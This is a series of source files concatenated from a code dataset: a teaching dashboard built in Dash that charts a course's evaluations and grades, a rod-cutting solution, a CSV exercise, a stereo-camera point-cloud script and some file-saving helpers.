facet_col=review_column,\n facet_col_wrap=2,\n labels={\n \"value\": 'Emotion' \n }\n )\n emotions_figure.for_each_annotation(lambda a: a.update(text=f'Homework {a.text.split(\"=\")[-1].split(\".\")[0]}'))\n return emotions_figure\n\ndef create_sei_tab() -> dcc.Tab:\n \"\"\"\n Creates the tab containing all of the student evaluation of instruction figures.\n\n :return: the tab containing all of the student evaluation of instruction figures\n \"\"\"\n return dcc.Tab(label=\"Student Evaluation of Instruction\", children=[\n html.H2(children='Student Evaluation of Instruction'),\n html.P(children=\n '''\n Each semester, the university asks students to fill out a survey about the instruction for the course.\n These data are anonymized and provided as averages for each question. Here is the breakdown of my scores\n against the scores for various cohorts including my department, my college, and my university. In general,\n I outperform all three cohorts, but I'm noticing a downward trend in course organization. For context,\n I taught CSE 1223 in the Fall of 2018 and the Spring of 2019. I've been teaching CSE 2221 ever since, with\n a year gap for research. \n '''\n ),\n dcc.Graph(id=\"bad-scale-1\", figure=sei_fig),\n ])\n\ndef create_course_eval_tab() -> dcc.Tab:\n return dcc.Tab(label=\"Course Evaluation Survey\", children=[\n html.H2(children='Course Evaluation Survey Data'),\n dcc.Markdown(\n '''\n At the end of each semester, I ask students to give me feedback on the course. These data are collected\n through a Google Form. Questions are broken down into different areas which include feedback on\n course content, my skill and responsiveness, and the course's contribution to learning. **Note**:\n future work is being done to ensure the following plots feature review counts as seen in the assignment\n survey data. \n '''\n ),\n html.H3(children='Course Content'),\n html.P(children=\n '''\n One way the course was evaluated was by asking students to rate their satisfaction with the course content.\n In short, there are four questions that I ask that cover topics that range from learning objectives to\n organization. Generally, the students that choose to fill out the course survey seem to be satisfied with \n the course content. For example, at this time, there have been no \"strongly disagree\" responses. \n '''\n ),\n dcc.Graph(figure=course_content_fig),\n html.H3(children='Skill and Responsiveness of the Instructor'),\n html.P(children=\n '''\n Another way the course was evaluated was by asking students to rate their satisfaction with the instructor, me.\n This time around, I ask six questions which range from satisfaction with time usage to satisfaction\n with grading. Again, students are generally happy with my instruction. In fact, they're often more happy\n with my instruction than the course content itself. \n '''\n ),\n dcc.Graph(figure=skill_and_responsiveness_fig),\n html.H3(children='Contribution to Learning'),\n dcc.Markdown(\n '''\n Yet another way the course was evaluated was by asking students how much they felt the course contributed to \n their learning. In this section of the survey, I ask students four questions that attempt to chart how much\n students felt they learned over the course of the semester. In general, students believe they learned a great\n deal, with most students reporting only a fair amount of knowledge coming into the course and a very good\n amount of knowledge at the end of the course. **TODO**: I should add a plot showing the scores for all four\n questions with an additional plot showing the trajectory of learning over the semester.\n '''\n ),\n dcc.Graph(figure=contribution_to_learning_fig),\n ])\n\ndef create_assignment_survey_tab() -> dcc.Tab:\n return dcc.Tab(label=\"Assignment Survey [CSE 2221]\", children=[\n html.H2(children='Assignment Survey Data [CSE 2221]'),\n html.P(children=\n '''\n Throughout the course, I asked students to give me feedback on the assignments. Originally,\n these data were collected through a Carmen quiz (Autumn 2021). However, I found the Carmen \n quiz format to be limiting, so later iterations of the quiz were administered through a Google\n Form. \n '''\n ),\n html.H3(children='Time Spent Working on Projects'),\n html.P(children=\n '''\n One of the questions I asked my students was how long they spent on each project. Based on the responses,\n I found that students spent between 2 and 7.5 hours on each project on average. In general, these values\n trend up as the semester progresses. If we assume that students then spend an average of 4 hours on each\n project, they will conduct roughly 44 hours of work over the course of the semester. \n '''\n ), # TODO: use an f-string to include the min and max average here\n dcc.Graph(figure=project_time_fig),\n html.H3(children='Time Spent Working on Homework Assignments'),\n html.P(children=\n '''\n Similarly, I asked students to tell me how much time they spent on the homework assignments.\n The data is fairly preliminary, so I only have the first few homework assignments. That\n said, I am finding that students spend multiple hours a week on each written assignment.\n '''\n ),\n dcc.Graph(figure=homework_time_fig),\n html.H3(children='Emotional Experience with Assignments'),\n html.P(children=\n '''\n Something new I tried in 2022 was asking students about the emotions they experienced\n before, during, and after assignments. For this, I borrowed the emotions from\n Control Value Theory and asked students retrospectively about their emotions. As it\n is early in the semester, I decided to only plot the homework assignments. Later,\n I'll update this dashboard to include the project assignments as well. \n '''\n ),\n dcc.Graph(figure=emotions_fig),\n html.H3(children='Rubric Evaluation'),\n html.P(children=\n \"\"\"\n Another question I asked my students was about their satisfaction with the rubrics for each project. \n The following plot gives the overview of the rubric ratings over all 11 projects. In general,\n it appears students are fairly satisfied with the rubrics.\n \"\"\"\n ),\n dcc.Graph(figure=rubric_fig),\n dcc.Markdown(\n \"\"\"\n In case you were curious about each project individually, here is a breakdown of the rubric scores for each project. \n \"\"\"\n ),\n dcc.Graph(id=\"bad-scale-2\", figure=rubric_breakdown_fig),\n dcc.Markdown(\n \"\"\"\n And just to be perfectly explicit, I also computed average scores for each rubric over all 11 projects.\n These scores are computed by assigning Very Dissatisfied (1) to the lowest score and Very Satisfied (5) \n to the highest score. Then, we sum up all the values and divide by the number of reviews. As a result,\n you can see that students are generally the least satisfied with the project 1 rubric and most satisfied\n with the project 3 rubric. \n \"\"\"\n ),\n dcc.Graph(figure=rubric_scores_fig),\n ])\n\ndef create_grades_tab() -> dcc.Tab:\n return dcc.Tab(label=\"Grades [CSE 2221]\", children=[\n html.H2(children='Grades [CSE 2221]'),\n html.P(children=\n '''\n Each semester, I collect grades for 22 homework assignments, 11 projects, and 3 exams. Fortunately,\n I have graders for the bulk of it, but I grade the exams. Recently, I decided to put together a\n database of grades which allows me to generate some pretty interesting plots.\n '''\n ),\n html.H3(children='Overview'),\n dcc.Markdown(children=\n '''\n Given the different types of grade data I collect, I figured I'd start by sharing an overview\n of the grades by type. **TODO**: There is an assumption that there are three exams each semester.\n One semester, there was only one exam before COVID. Grades from the semester of COVID have been\n filtered out of the overview plots.\n '''\n ),\n dcc.Graph(figure=grade_overview_fig),\n html.P(children=\n '''\n Given the history of grades in this course, I was also interested in seeing how the grades correlated\n with attendance, which is a metric I track through Top Hat. For context, I don't force attendance,\n so the attendance scores are more of a lower bound.\n '''\n ),\n dcc.Graph(figure=grades_vs_attendance),\n html.P(children=\n '''\n At the moment, the connection between attendance and grades is pretty small. At the time of writing,\n the correlation between attendance and grades gives an R-squared of .23. I can't remember off the top of my\n head if this is a considered a good correlation in education, but online reasources point to this being\n a weak to moderate positive correlation. \n '''\n ),\n html.P(children=\n '''\n Now, in order to get an attendance grade, you just enter some digits at the start of class.\n Participation, on the other hand, is calculated based on interaction with Top Hat. Some semesters,\n I've used Top Hat more often than others. For example, I used to use it quite a bit for Peer\n Instruction. These days, I don't use it as much, but it may be useful in demonstrating a\n strong correlation with grades. \n '''\n ),\n dcc.Graph(figure=grades_vs_participation),\n html.P(children=\n '''\n At the time of writing, the correlation was slightly stronger with an R-squared of .28. Though,\n there's not much to brag about there. That said, it does imply that attendance and participation\n positively correlate with grades. I wouldn't go as far as to say that attending class will\n improve your grades, but I would be lying if I didn't tell you that it could. \n '''\n ),\n html.H3(children='Project Grades'),\n html.P(children=\n '''\n To start, I'd like to talk about the 11 projects. Specifically, I'll share the average and median grade\n for each project. The key takeaway here is that project 1 is a slam dunk while project 8 is a bit rough.\n '''\n ),\n dcc.Graph(figure=project_calculations_fig),\n html.P(children=\n '''\n While medians and averages are helpful, I also think it's useful to look at just how many students\n actually complete the projects. Or rather, what percentage of students skip out on projects, and\n is there a trend to observe? If so (spoiler alert: students turn in less work as the semester \n progresses), that could potentially explain the low averages for certain projects. \n '''\n ),\n dcc.Graph(figure=missing_project_fig),\n dcc.Markdown(\n '''\n Unfortunately, one of the drawbacks of the plots above is that they aggregate the data for every\n semester I've taught the course. Personally, I like to see trends, right? For example, it's \n helpful to know if project grades are getting better over time. What I'm finding is that's not\n the case. Frankly, I think most of this is due to grader influences, but I have not investigated\n that. **TODO**: I should include grader influences in the plot. \n '''\n ),\n dcc.Graph(figure=project_trend_fig),\n dcc.Markdown(\n '''\n Next, we get into the \"advanced\" metrics. In this case, I thought it would be interesting to combine\n some of the data found in the assignment survey with the grade data. For instance, remember how\n I previously shared the amount of time students spent on each project on average? Well, I figured\n it would be interesting to see how many points a student could expect to earn per hour on average.\n Ultimately, I ended up calling this metric \"Expected Value\" because it gives us a sense of how\n much value a student could get out of their time. With this metric, we're able to clearly see that \n project 1 offers the most bang for your buck. Meanwhile, Project 8 offers very little in terms of\n value for your time. \n '''\n ),\n dcc.Graph(figure=project_points_per_hour_fig),\n dcc.Markdown(\n '''\n Interestingly, if we invert the previous plot, we get what I'm calling the \"Expected Effort\" metric.\n Rather than describing the amount of points we expect to get for an hour of work, we begin talking\n about how much time we expect to give for a point. The distinction is fairly minor, but it allows\n us to see which projects require the most effort. In this case, the roles are reversed. Project 1\n requires the least amount of effort, while project 8 requires the most.\n '''\n ),\n dcc.Graph(figure=project_hours_per_point_fig),\n html.H3(children='Homework Grades'),\n dcc.Markdown(\n '''\n In addition to 11 projects, we also assign 22 homework assignments. These assignments are graded\n on completion for a maximum of 2 points each. Naturally, here's the breakdown of average and median\n scores for each assignment. As you can see, students generally get full credit, but there are some\n students who pull the average down with incomplete assignments (more on that later).\n '''\n ),\n dcc.Graph(figure=homework_calculations_fig),\n dcc.Markdown(\n '''\n As promised, here's a look at the trend of homework completion. As with projects, students tend\n to submit fewer assignments as the semester progresses. Though, I find it interesting that there\n are spikes in missing assignments at various points throughout the semester. I suspect that the \n assignments that students submit least often are tied to larger review assignments before exams.\n **TODO**: I should look into this more.\n '''\n ),\n dcc.Graph(figure=missing_homework_fig),\n dcc.Markdown(\n '''\n Finally, here's a look at the trend of grades for the homework assignments. I find this plot really\n interesting because it shows the spread of homework grades against each semester. For instance,\n there is quite the spread of homework averages in Autumn 2021. \n '''\n ),\n dcc.Graph(figure=homework_trend_fig),\n html.H3(children='Exam Grades'),\n dcc.Markdown(\n '''\n At this point, all that is left to discuss are the exams. In total, there are three exams, and the\n general trend tends to be that scores go down as the semester progresses. I haven't quite figured\n out why. \n '''\n ),\n dcc.Graph(figure=exams_calculations_fig),\n dcc.Markdown(\n '''\n As with projects and homework assignments, I find it important to also track the percentage of students\n who skip exams. In general, it's pretty rare for a student to skip an exam, and it's usually due to some\n extreme circumstance. That said, the trend remains the same for exams as well (i.e., fewer students attend\n the exams as the semester progresses).\n '''\n ),\n dcc.Graph(figure=missing_exam_fig),\n dcc.Markdown(\n '''\n All that is left to talk about is the exam score trend over time. One thing that is worth noting is that\n the exams were not consistent from semester to semester. For example, you'll notice that exams 2 and 3\n are missing data points. The reason for this is that we eventually converted those exams to online quizzes\n due to COVID. As a result, those quiz scores are omitted. It's also worth noting that the data points in\n Summer 2019 are from before I started teaching the course (i.e., I was training to teach it at the time).\n As a result, the first time I taught the course, my exam scores were quite low. Since then, things have\n improved considerably. Well, except for the final exam. I'll be looking to provide more ways for\n students to practice ahead of time. \n '''\n ),\n dcc.Graph(figure=exam_trend_fig),\n ])\n\ndef create_app_layout(): \n return html.Div(children=[\n html.H1(children='The Educator Dashboard'),\n html.Hr(),\n html.P(children=\n '''\n A collection of visualizations related to courses taught by myself, Jeremy Grifski, with the first two tabs dedicated\n to an overview of my ability as an instructor and the last two tabs dedicated to one of my courses. \n '''\n ),\n dcc.Tabs([\n create_sei_tab(),\n create_course_eval_tab(),\n create_assignment_survey_tab(),\n create_grades_tab()\n ])\n])\n\n# Global app\napp = dash.Dash(\n __name__,\n external_scripts=[\n {\n \"src\": \"https://plausible.io/js/plausible.js\",\n \"data-domain\": \"educator.jeremygrifski.com\"\n }\n ],\n title=\"The Educator Dashboard\"\n)\nserver = app.server\n\n# Assignment survey figures\nassignment_survey_data = pd.read_csv('https://raw.githubusercontent.com/jrg94/personal-data/main/education/assignment-survey-data.csv')\nassignment_survey_data[avg_time] = assignment_survey_data.groupby(project_review_col)[time_col].transform(lambda x: x.mean())\nassignment_survey_data[median_time] = assignment_survey_data.groupby(project_review_col)[time_col].transform(lambda x: x.median())\nassignment_survey_data[review_count] = assignment_survey_data.groupby(project_review_col)[time_col].transform(lambda x: x.count())\nassignment_survey_data[std_time] = assignment_survey_data.groupby(project_review_col)[time_col].transform(lambda x: x.std())\nhomework_time_mean = assignment_survey_data.groupby(homework_review_col)[time_col].transform(lambda x: x.mean())\nhomework_time_median = assignment_survey_data.groupby(homework_review_col)[time_col].transform(lambda x: x.median())\nhomework_time_count = assignment_survey_data.groupby(homework_review_col)[time_col].transform(lambda x: x.count())\nhomework_time_std = assignment_survey_data.groupby(homework_review_col)[time_col].transform(lambda x: x.std())\nassignment_survey_data.loc[homework_time_mean.index, avg_time] = homework_time_mean\nassignment_survey_data.loc[homework_time_median.index, median_time] = homework_time_median\nassignment_survey_data.loc[homework_time_count.index, review_count] = homework_time_count\nassignment_survey_data.loc[homework_time_std.index, std_time] = homework_time_std\nassignment_survey_data[pre_emotions_column] = assignment_survey_data[pre_emotions_column].astype(str).apply(lambda x: x.split(\";\"))\nassignment_survey_data[during_emotions_column] = assignment_survey_data[during_emotions_column].astype(str).apply(lambda x: x.split(\";\"))\nassignment_survey_data[post_emotions_column] = assignment_survey_data[post_emotions_column].astype(str).apply(lambda x: x.split(\";\"))\nproject_time_fig = create_time_fig(assignment_survey_data, col=project_review_col)\nhomework_time_fig = create_time_fig(assignment_survey_data, col=homework_review_col)\nrubric_scores_fig = create_rubric_scores_fig(assignment_survey_data)\nassignment_survey_data[rubric_heading] = assignment_survey_data[rubric_heading].map(satisfaction_mapping)\nrubric_fig = create_rubric_overview_fig(assignment_survey_data)\nrubric_breakdown_fig = create_rubric_breakdown_fig(assignment_survey_data)\nemotions_fig = create_emotions_fig(assignment_survey_data, review_column=homework_review_col)\n\n# SEI figures\nsei_data = pd.read_csv('https://raw.githubusercontent.com/jrg94/personal-data/main/education/sei-data.csv')\nsei_fig = create_sei_fig(sei_data)\n\n# Course evaluation figures\ncourse_eval_data = pd.read_csv('https://raw.githubusercontent.com/jrg94/personal-data/main/education/eval-data.csv')\ncourse_content_fig = create_course_eval_fig(course_eval_data, \"Course content\", likert_scale)\nskill_and_responsiveness_fig = create_course_eval_fig(course_eval_data, \"Skill and responsiveness\", likert_scale)\ncontribution_to_learning_fig = create_course_eval_fig(course_eval_data, \"Contribution to learning\", likert_scale_alt)\n\n# Assignment figures\ngrade_data = pd.read_csv('https://raw.githubusercontent.com/jrg94/personal-data/main/education/cse-2221-grades.csv')\ngrade_data[\"Date\"] = pd.to_datetime(grade_data[\"Date\"])\ngrade_overview_fig = create_grades_fig(grade_data)\ngrades_vs_attendance = create_correlation_fig(grade_data, \"TH-Attendance\", \"Top Hat Attendance\")\ngrades_vs_participation = create_correlation_fig(grade_data, \"Top Hat\", \"Top Hat Participation\")\nproject_calculations_fig = create_assignment_fig(grade_data, \"Project\", 10)\nhomework_calculations_fig = create_assignment_fig(grade_data, \"Homework\", 2)\nexams_calculations_fig = create_assignment_fig(grade_data, \"Exam\", 100)\nmissing_project_fig = create_missing_assignment_fig(grade_data, \"Project\")\nmissing_homework_fig = create_missing_assignment_fig(grade_data, \"Homework\")\nmissing_exam_fig = create_missing_assignment_fig(grade_data, \"Exam\")\nproject_trend_fig = create_project_trend_fig(grade_data, \"Project\")\nhomework_trend_fig = create_project_trend_fig(grade_data, \"Homework\")\nexam_trend_fig = create_project_trend_fig(grade_data, \"Exam\")\nproject_points_per_hour_fig, project_hours_per_point_fig = create_value_fig(grade_data, assignment_survey_data, \"Project\", 10)\n\napp.layout = create_app_layout()\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"jrg94/educator-dashboard","sub_path":"dashboard/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":33987,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41629004858","text":"#User function Template for python3\nimport sys\nclass Solution:\n # def f(self,ind,n,price,dp):\n # if ind==0:\n # return price[ind]*n\n # if dp[ind][n]!=-1:\n # return dp[ind][n]\n \n # nottake=0+self.f(ind-1,n,price,dp)\n # rodlength=ind+1\n # take=-sys.maxsize-1\n # if rodlength<=n:\n # take=price[ind]+self.f(ind,n-rodlength,price,dp)\n # dp[ind][n]= max(take,nottake)\n # return dp[ind][n]\n \n def cutRod(self, price, n):\n dp = [0] * (n + 1)\n for i in range(1, n + 1):\n for j in range(i):\n dp[i] = max(dp[i], price[j] + dp[i - j - 1])\n return dp[n]\n \n\n \n \n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\ndef main():\n\n T = int(input())\n\n while(T > 0):\n n = int(input())\n a = [int(x) for x in input().strip().split()]\n ob = Solution()\n print(ob.cutRod(a, n))\n\n T -= 1\n\n\nif __name__ == \"__main__\":\n main()\n# } Driver Code Ends","repo_name":"akashprap/Coding-Problems","sub_path":"Medium/Rod Cutting/rod-cutting.py","file_name":"rod-cutting.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42455348713","text":"#!/usr/bin/env python3\n\n\"\"\"Example of using the CSV package\"\"\"\n\n__author__ = 'Kayleigh Greenwood (kayleigh.greenwood21@imperial.ac.uk)'\n__version__ = '0.0.1'\n\n# IMPORTS\n\nimport csv\n\n# SCRIPT\n\nprint(\"Task 1\")\n# Read a file containing:'Species','Infraorder','Family','Distribution','Body mass male (Kg)'\nwith open('../data/testcsv.csv','r') as f: # opens the file as read\n csvread = csv.reader(f) # creates a csvread variable and stores the test.csv file\n temp = [] # creates a list named temp\n for row in csvread: #creates a loop to iterate through the rows in the csvread variable, which contains a copy of test.csv\n if row[0] == 'Species':\n continue\n temp.append(tuple(row)) # converts each row into a tuple, and adds this tuple to the temp list. \n print(row) # prints each row to the terminal\n print(\"The species is\", row[0], \"\\n\") #prints to the terminal the species name of each row\n\n\nprint(\"Task 2\")\n# write a file containing only species name and Body mass\nwith open('../data/testcsv.csv','r') as f: # opens testcsv.csv to read\n with open('../data/bodymass.csv','w') as g: # opens a file to write the new information in\n csvread = csv.reader(f) # opens the test.csv to read it\n csvwrite = csv.writer(g) # opens bodymass.csv to write it\n for row in csvread: #creates a for loop to iterate through the rows\n if row[0] == 'Species':\n continue\n print(row) #prints the row to this terminal\n csvwrite.writerow([row[0], row[4]]) #writes the first and fifth row into the bodymass.csv file\n","repo_name":"kayleigh-greenwood/CMEECoursework","sub_path":"week.2/code/basic_csv.py","file_name":"basic_csv.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38030244804","text":"#https://medium.com/@omar.ps16/stereo-3d-reconstruction-with-opencv-using-an-iphone-camera-part-iii-95460d3eddf0 \n#여기참고해서 point cloud로 변환하는부분 만들었어요\n\n#create_output()함수는 \n#https://github.com/erget/StereoVision/blob/master/stereovision/point_cloud.py \n#여기서 가져왔구요! \n#point랑 color랑 hstack하고 ply로 저장해서 MeshLab에서 보시면 됩니다.\n#이하 stereo_depth.py 입니다 q로 종료시켜주세요 파일크랙나요!\nimport numpy as np\nimport cv2\nimport argparse\nimport sys\nfrom calibration_store import load_stereo_coefficients\n\ndef depth_map(left_rectified, right_rectified):\n \"\"\" Depth map calculation. Works with SGBM and WLS. Need rectified images, returns depth map ( left to right disparity ) \"\"\"\n # SGBM Parameters -----------------\n window_size = 3 # wsize default 3; 5; 7 for SGBM reduced size image; 15 for SGBM full size image (1300px and above); 5 Works nicely\n # We need grayscale for disparity map.\n imgL = cv2.cvtColor(left_rectified, cv2.COLOR_BGR2GRAY)\n imgR = cv2.cvtColor(right_rectified, cv2.COLOR_BGR2GRAY)\n left_matcher = cv2.StereoSGBM_create(\n minDisparity=-1,\n numDisparities=5*16, # max_disp has to be dividable by 16 f. E. HH 192, 256\n blockSize=window_size,\n P1=8 * 3 * window_size,\n # wsize default 3; 5; 7 for SGBM reduced size image; 15 for SGBM full size image (1300px and above); 5 Works nicely\n P2=32 * 3 * window_size,\n disp12MaxDiff=12,\n uniquenessRatio=10,\n speckleWindowSize=50,\n speckleRange=32,\n preFilterCap=63,\n mode=cv2.STEREO_SGBM_MODE_SGBM_3WAY\n )\n right_matcher = cv2.ximgproc.createRightMatcher(left_matcher)\n # FILTER Parameters\n lmbda = 80000\n sigma = 1.3\n visual_multiplier = 6\n\n wls_filter = cv2.ximgproc.createDisparityWLSFilter(matcher_left=left_matcher)\n wls_filter.setLambda(lmbda)\n\n wls_filter.setSigmaColor(sigma)\n displ = left_matcher.compute(imgL, imgR) # .astype(np.float32)/16\n dispr = right_matcher.compute(imgR, imgL) # .astype(np.float32)/16\n displ = np.int16(displ)\n dispr = np.int16(dispr)\n\n filteredImg = wls_filter.filter(displ, imgL, None, dispr) # important to put \"imgL\" here!!!\n filteredImg = cv2.normalize(src=filteredImg, dst=filteredImg, beta=0, alpha=255, norm_type=cv2.NORM_MINMAX);\n filteredImg = np.uint8(filteredImg)\n\n #https://medium.com/@omar.ps16/stereo-3d-reconstruction-with-opencv-using-an-iphone-camera-part-iii-95460d3eddf0\n #에서 가져온 SGBM 파라미터입니다! 사실 별차이 없어요!!! filteredImg로 하셔도 됩니닷~~\n win_size = 5\n min_disp = -1\n max_disp = 63 # min_disp * 9\n num_disp = max_disp - min_disp # Needs to be divisible by 16\n # Create Block matching object.\n stereo = cv2.StereoSGBM_create(minDisparity=-1,\n numDisparities=num_disp,\n blockSize=5,\n uniquenessRatio=5,\n speckleWindowSize=5,\n speckleRange=5,\n disp12MaxDiff=1,\n P1=8 * 3 * win_size ** 2, # 8*3*win_size**2,\n P2=32 * 3 * win_size ** 2) # 32*3*win_size**2)\n dispmap = stereo.compute(imgL, imgR)\n dispmap = cv2.normalize(src=dispmap, dst=dispmap, beta=0, alpha=255, norm_type=cv2.NORM_MINMAX);\n point_cloud(dispmap,left_rectified)\n return filteredImg\n\ndef point_cloud(filteredImg,imgL):\n #https://medium.com/@omar.ps16/stereo-3d-reconstruction-with-opencv-using-an-iphone-camera-part-iii-95460d3eddf0\n # Q는 steror_cam.yml에서 가져왔어요\n Q = np.float32([[ 1., 0., 0., -4.6851158237457275e+02],\n [0., 1., 0., -2.6415181350708008e+02],\n [ 0., 0., 0., 5.3994586146833012e+02,],\n [ 0., 0., 1.6558455087828328e+01, 0.]])\n # This transformation matrix is derived from Prof. Didier Stricker's power point presentation on computer vision.\n # Link : https://ags.cs.uni-kl.de/fileadmin/inf_ags/3dcv-ws14-15/3DCV_lec01_camera.pdf\n\n # Reproject points into 3D\n points_3D = cv2.reprojectImageTo3D(filteredImg, Q)\n # Get color points\n colors = cv2.cvtColor(imgL, cv2.COLOR_BGR2RGB)\n # Get rid of points with value 0 (i.e no depth)\n mask_map = filteredImg > filteredImg.min()\n # Mask colors and points.\n output_points = points_3D[mask_map]\n output_colors = colors[mask_map]\n # Define name for output file\n output_file = 'reconstructed.ply'\n # Generate point cloud\n print (\"\\n Creating the output file... \\n\")\n create_output(output_points, output_colors, output_file)\n\ndef create_output(output_points, output_colors, output_file):\n #https://github.com/erget/StereoVision/blob/master/stereovision/point_cloud.py\n #에서 가져온 ply저장입니다. MeshLab 에서 ply파일 읽으시면되요!\n ply_header = (\n '''ply\n format ascii 1.0\n element vertex {vertex_count}\n property float x\n property float y\n property float z\n property uchar red\n property uchar green\n property uchar blue\n end_header\n ''')\n points = np.hstack([output_points, output_colors])\n with open(output_file, 'w') as outfile:\n outfile.write(ply_header.format(\n vertex_count=len(points)))\n np.savetxt(outfile, points, '%f %f %f %d %d %d')\n\n\n\nif __name__ == '__main__':\n # Args handling -> check help parameters to understand\n parser = argparse.ArgumentParser(description='Camera calibration')\n parser.add_argument('--calibration_file', type=str, required=True, help='Path to the stereo calibration file')\n parser.add_argument('--left_source', type=str, required=True, help='Left video or v4l2 device name')\n parser.add_argument('--right_source', type=str, required=True, help='Right video or v4l2 device name')\n parser.add_argument('--is_real_time', type=int, required=True, help='Is it camera stream or video')\n\n args = parser.parse_args()\n\n # is camera stream or video\n if args.is_real_time:\n cap_left = cv2.VideoCapture(args.left_source, cv2.CAP_V4L2)\n cap_right = cv2.VideoCapture(args.right_source, cv2.CAP_V4L2)\n else:\n cap_left = cv2.VideoCapture(args.left_source)\n cap_right = cv2.VideoCapture(args.right_source)\n\n K1, D1, K2, D2, R, T, E, F, R1, R2, P1, P2, Q = load_stereo_coefficients(args.calibration_file) # Get cams params\n\n if not cap_left.isOpened() and not cap_right.isOpened(): # If we can't get images from both sources, error\n print(\"Can't opened the streams!\")\n sys.exit(-9)\n\n # Change the resolution in need\n cap_right.set(cv2.CAP_PROP_FRAME_WIDTH, 640) # float\n cap_right.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) # float\n\n cap_left.set(cv2.CAP_PROP_FRAME_WIDTH, 640) # float\n cap_left.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) # float\n\n while True: # Loop until 'q' pressed or stream ends\n # Grab&retreive for sync images\n if not (cap_left.grab() and cap_right.grab()):\n print(\"No more frames\")\n break\n\n _, leftFrame = cap_left.retrieve()\n _, rightFrame = cap_right.retrieve()\n height, width, channel = leftFrame.shape # We will use the shape for remap\n\n # Undistortion and Rectification part!\n leftMapX, leftMapY = cv2.initUndistortRectifyMap(K1, D1, R1, P1, (width, height), cv2.CV_32FC1)\n left_rectified = cv2.remap(leftFrame, leftMapX, leftMapY, cv2.INTER_LINEAR, cv2.BORDER_CONSTANT)\n rightMapX, rightMapY = cv2.initUndistortRectifyMap(K2, D2, R2, P2, (width, height), cv2.CV_32FC1)\n right_rectified = cv2.remap(rightFrame, rightMapX, rightMapY, cv2.INTER_LINEAR, cv2.BORDER_CONSTANT)\n\n\n disparity_image = depth_map(left_rectified, right_rectified) # Get the disparity map\n\n # Show the images\n cv2.imshow('left(R)', leftFrame)\n cv2.imshow('right(R)', rightFrame)\n cv2.imshow('Disparity', disparity_image)\n\n if cv2.waitKey(1) & 0xFF == ord('q'): # Get key to stop stream. Press q for exit\n break\n\n # Release the sources.\n cap_left.release()\n cap_right.release()\n cv2.destroyAllWindows()\n","repo_name":"philgineer/Deeplearning_projects","sub_path":"pill_detection&classification/00_crawling.py","file_name":"00_crawling.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3341952478","text":"import csv\nimport json\nimport os\nimport pickle\nfrom operator import itemgetter\nfrom pathlib import Path\nfrom random import shuffle\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\n\ndef _handle_dirs(pathname, foldername, subfoldername):\n path = Path(pathname)\n if foldername is not None:\n path = path / foldername\n if not os.path.isdir(path):\n os.mkdir(path)\n if subfoldername is not None:\n path = path / subfoldername\n if not os.path.isdir(path):\n os.mkdir(path)\n return path\n\n\ndef savefig(\n name,\n format=\"png\",\n dpi=300,\n foldername=None,\n subfoldername=\"figs\",\n pathname=\"./maggot_models/notebooks/outs\",\n bbox_inches=\"tight\",\n pad_inches=0.5,\n save_on=True,\n transparent=False,\n print_out=True,\n **kws,\n):\n if save_on:\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".\" + format)\n plt.savefig(\n savename,\n format=format,\n facecolor=\"white\",\n transparent=transparent,\n bbox_inches=bbox_inches,\n pad_inches=pad_inches,\n dpi=dpi,\n **kws,\n )\n if print_out:\n print(f\"Saved figure to {savename}\")\n\n\ndef saveobj(\n obj,\n name,\n foldername=None,\n subfoldername=\"objs\",\n pathname=\"./maggot_models/notebooks/outs\",\n save_on=True,\n):\n if save_on:\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".pickle\")\n with open(savename, \"wb\") as f:\n pickle.dump(obj, f)\n print(f\"Saved object to {savename}\")\n\n\ndef saveskels(\n name,\n ids,\n labels,\n colors=None,\n palette=\"tab10\",\n foldername=None,\n subfoldername=\"jsons\",\n pathname=\"./maggot_models/notebooks/outs\",\n multiout=False,\n save_on=True,\n postfix=\"\",\n):\n \"\"\"Take a list of skeleton ids and output as json file for catmaid\n\n Parameters\n ----------\n name : str\n filename to save output\n ids : list or array\n skeleton ids\n colors : list or array\n either a hexadecimal color for each skeleton or a label for each skeleton to be\n colored by palette\n palette : str or None, optional\n if not None, this is a palette specification to use to color skeletons\n \"\"\"\n if save_on:\n uni_labels = np.unique(labels)\n n_labels = len(uni_labels)\n\n if colors is None:\n if isinstance(palette, str):\n pal = sns.color_palette(palette, n_colors=n_labels)\n pal = pal.as_hex()\n else:\n pal = palette\n # uni_labels = [int(i) for i in uni_labels]\n colormap = dict(zip(uni_labels, pal))\n colors = np.array(itemgetter(*colors)(colormap))\n\n opacs = np.array(len(ids) * [1])\n\n path = _handle_dirs(pathname, foldername, subfoldername)\n\n if multiout:\n\n for l in uni_labels:\n filename = path / str(name + \"-\" + str(l) + postfix + \".json\")\n\n inds = np.where(labels == l)[0]\n\n spec_list = [\n {\"skeleton_id\": int(i), \"color\": str(c), \"opacity\": float(o)}\n for i, c, o in zip(ids[inds], colors[inds], opacs[inds])\n ]\n with open(filename, \"w\") as fout:\n json.dump(spec_list, fout)\n else:\n spec_list = [\n {\"skeleton_id\": int(i), \"color\": str(c), \"opacity\": float(o)}\n for i, c, o in zip(ids, colors, opacs)\n ]\n filename = path / str(name + \".json\")\n with open(filename, \"w\") as fout:\n json.dump(spec_list, fout)\n\n if palette is not None:\n # return (spec_list, colormap, pal)\n return spec_list\n else:\n return spec_list\n\n\ndef savecsv(\n df,\n name,\n foldername=None,\n subfoldername=\"csvs\",\n pathname=\"./maggot_models/notebooks/outs\",\n save_on=True,\n):\n if save_on:\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".csv\")\n df.to_csv(savename)\n print(f\"Saved DataFrame to {savename}\")\n\n\ndef savelol(\n lol,\n name,\n foldername=None,\n 